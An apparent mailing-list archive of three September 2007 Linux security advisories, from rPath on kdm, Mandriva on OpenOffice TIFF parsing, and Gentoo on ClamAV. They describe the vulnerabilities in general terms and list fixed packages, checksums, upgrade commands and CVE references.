rPath Security Advisory: 2007-0194-1 Published: 2007-09-20 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Root Deterministic Unauthorized Access Updated Versions: kdebase=/[EMAIL PROTECTED]:devel//1/3.4.2-3.14-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1725 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4569 Description: Previous versions of the kdebase package contain a kdm vulnerability in which an unprivileged user may, if auto-login is enabled, be allowed to log in as a another user (or as root) without supplying proper login credentials. If kdm is also configured to service incoming XDMCP requests, remote root unauthorized access may be possible. In its default configuration, rPath Linux 1 is not vulnerable to this unauthorized access. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ MDKSA-2007:186 ] - Updated openoffice.org packages fix TIFF parser vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:186 http://www.mandriva.com/security/ ___ Package : openoffice.org Date: September 17, 2007 Affected: 2007.0, 2007.1, Corporate 3.0 ___ Problem Description: An integer overflow in the TIFF parser in OpenOffice.org prior to version 2.3 allows remote attackers to execute arbitrary code via a TIFF file with crafted values which triggers the allocation of an incorrect amount of memory which results in a heap-based buffer overflow. Updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2834 ___ Updated Packages: Mandriva Linux 2007.0: a4d81424938e8f51451b422cf84eca3e 2007.0/i586/openoffice.org-2.0.4-2.6mdv2007.0.i586.rpm c7cfae30e45b58b6f826a467aac6c464 2007.0/i586/openoffice.org-devel-2.0.4-2.6mdv2007.0.i586.rpm 0b7444dd2eb7e9c527440404d87c4de0 2007.0/i586/openoffice.org-devel-doc-2.0.4-2.6mdv2007.0.i586.rpm cf856763e033e016112db04298055901 2007.0/i586/openoffice.org-galleries-2.0.4-2.6mdv2007.0.i586.rpm 3b5e3e3f255e5de7f91b479256c7ffe2 2007.0/i586/openoffice.org-gnome-2.0.4-2.6mdv2007.0.i586.rpm d3b1815e496804d46fe3da2c57118c54 2007.0/i586/openoffice.org-kde-2.0.4-2.6mdv2007.0.i586.rpm a68cd22f05465911153f2b768e3b9258 2007.0/i586/openoffice.org-l10n-af-2.0.4-2.6mdv2007.0.i586.rpm 1aaef2f8996dc632427eb8e6fbed2838 2007.0/i586/openoffice.org-l10n-ar-2.0.4-2.6mdv2007.0.i586.rpm b5d755dc3276d506dd0a3f9c4818b1a9 2007.0/i586/openoffice.org-l10n-bg-2.0.4-2.6mdv2007.0.i586.rpm 313211a1c180fba5b3a09863aa1a58c0 2007.0/i586/openoffice.org-l10n-br-2.0.4-2.6mdv2007.0.i586.rpm 50aab14a093c2c590bee2ab49ac09534 2007.0/i586/openoffice.org-l10n-bs-2.0.4-2.6mdv2007.0.i586.rpm d38dce9bac2b5ee8fd95bab8bbaa9954 2007.0/i586/openoffice.org-l10n-ca-2.0.4-2.6mdv2007.0.i586.rpm dce2af3766f2531cf5e7170971877d3f 2007.0/i586/openoffice.org-l10n-cs-2.0.4-2.6mdv2007.0.i586.rpm f7bf25d2c4cd966ba149b5046a7f0f20 2007.0/i586/openoffice.org-l10n-cy-2.0.4-2.6mdv2007.0.i586.rpm 9795689550c442cc73d896fcf94308bb 2007.0/i586/openoffice.org-l10n-da-2.0.4-2.6mdv2007.0.i586.rpm 729a20d3aba6b7229d44aac31d6aeb03 2007.0/i586/openoffice.org-l10n-de-2.0.4-2.6mdv2007.0.i586.rpm a91c27612ab8d13aea02056fb5507eb4 2007.0/i586/openoffice.org-l10n-el-2.0.4-2.6mdv2007.0.i586.rpm 372eaa95e9d3a01a658a3db5d1a4a1b5 2007.0/i586/openoffice.org-l10n-en_GB-2.0.4-2.6mdv2007.0.i586.rpm d95d301efc6c8686c948c1781d5571ab 2007.0/i586/openoffice.org-l10n-es-2.0.4-2.6mdv2007.0.i586.rpm af8317081d0ad527ec4c45db0eaf0f8c 2007.0/i586/openoffice.org-l10n-et-2.0.4-2.6mdv2007.0.i586.rpm 93b373dac33c8c53a9ef9e1ec34574df 2007.0/i586/openoffice.org-l10n-eu-2.0.4-2.6mdv2007.0.i586.rpm b17930722ff857244d7c94f965f70ef7 2007.0/i586/openoffice.org-l10n-fi-2.0.4-2.6mdv2007.0.i586.rpm 30bdc0252f1be35a663c204b5322f889 2007.0/i586/openoffice.org-l10n-fr-2.0.4-2.6mdv2007.0.i586.rpm 1e26e7adccf5ba445bce6c7f642be0f5 2007.0/i586/openoffice.org-l10n-he-2.0.4-2.6mdv2007.0.i586.rpm 6668d9efdef95f362a2b7741e9c37a37 2007.0/i586/openoffice.org-l10n-hi-2.0.4-2.6mdv2007.0.i586.rpm b58e47fbf541c4428cbfa7128d67e0dd 2007.0/i586/openoffice.org-l10n-hu-2.0.4-2.6mdv2007.0.i586.rpm 12b4442a8a01b846f4f0f55bc61a2329 2007.0/i586/openoffice.org-l10n-it-2.0.4-2.6mdv2007.0.i586.rpm c812895ebede2613f2054d75f9b46dcf 2007.0/i586/openoffice.org-l10n-ja-2.0.4-2.6mdv2007.0.i586.rpm c83c4873ba5c93e41502581a33ef9eaf 2007.0/i586/openoffice.org-l10n-ko-2.0.4-2.6mdv2007.0.i586.rpm 27a4b865b57e2e08274f5a8d49050612 2007.0/i586/openoffice.org-l10n-mk-2.0.4-2.6mdv2007.0.i586.rpm 1877c9bf19a8f922007a278572103250 2007.0/i586/openoffice.org-l10n-nb-2.0.4-2.6mdv2007.0.i586.rpm 5770df672d5ce0f244df4f137d3356aa 2007.0/i586/openoffice.org-l10n-nl-2.0.4-2.6mdv2007.0.i586.rpm c1f28b42c6001ea6cd0659880347755a 2007.0/i586/openoffice.org-l10n-nn-2.0.4-2.6mdv2007.0.i586.rpm 9fb81f43add5b9a8fe612aa5b05735b7 2007.0/i586/openoffice.org-l10n-pl-2.0.4-2.6mdv2007.0.i586.rpm b1c4b5bdecff7ab2242ece96aa540b62 2007.0/i586/openoffice.org-l10n-pt-2.0.4-2.6mdv2007.0.i586.rpm 7f8aa8f46ed109a3e9d63b8ad7d89311 2007.0/i586/openoffice.org-l10n-pt_BR-2.0.4-2.6mdv2007.0.i586.rpm ddbbf41dd54b1794356f560e4222cb0d 2007.0/i586/openoffice.org-l10n-ru-2.0.4-2.6mdv2007.0.i586.rpm 002770cede8ccfe5b92c585d72955ae1 2007.0/i586/openoffice.org-l10n-sk-2.0.4-2.6mdv2007.0.i586.rpm acd074d4812fa4ee361363bc064c7d80 2007.0/i586/openoffice.org-l10n-sl-2.0.4-2.6mdv2007.0.i586.rpm
[ GLSA 200709-14 ] ClamAV: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200709-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: ClamAV: Multiple vulnerabilities Date: September 20, 2007 Bugs: #189912 ID: 200709-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Vulnerabilities have been discovered in ClamAV allowing remote execution of arbitrary code and Denial of Service attacks. Background == Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav 0.91.2 = 0.91.2 Description === Nikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to popen() when executing sendmail (CVE-2007-4560). Also, NULL-pointer dereference errors exist within the cli_scanrtf() function in libclamav/rtf.c and Stefanos Stamatis discovered a NULL-pointer dereference vulnerability within the cli_html_normalise() function in libclamav/htmlnorm.c (CVE-2007-4510). Impact == The unsanitized recipient address can be exploited to execute arbitrary code with the privileges of the clamav-milter process by sending an email with a specially crafted recipient address to the affected system. Also, the NULL-pointer dereference errors can be exploited to crash ClamAV. Successful exploitation of the latter vulnerability requires that clamav-milter is started with the black hole mode activated, which is not enabled by default. Workaround == There is no known workaround at this time. Resolution == All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-antivirus/clamav-0.91.2 References == [ 1 ] CVE-2007-4510 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4510 [ 2 ] CVE-2007-4560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200709-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFG8utnuhJ+ozIKI5gRAmMkAKCDDq+kFKHDaDbdWWWyHd7UcWISQwCbB+39 /DA8NxuOjBKxEw0ESjw2bgY= =QLPG -END PGP SIGNATURE-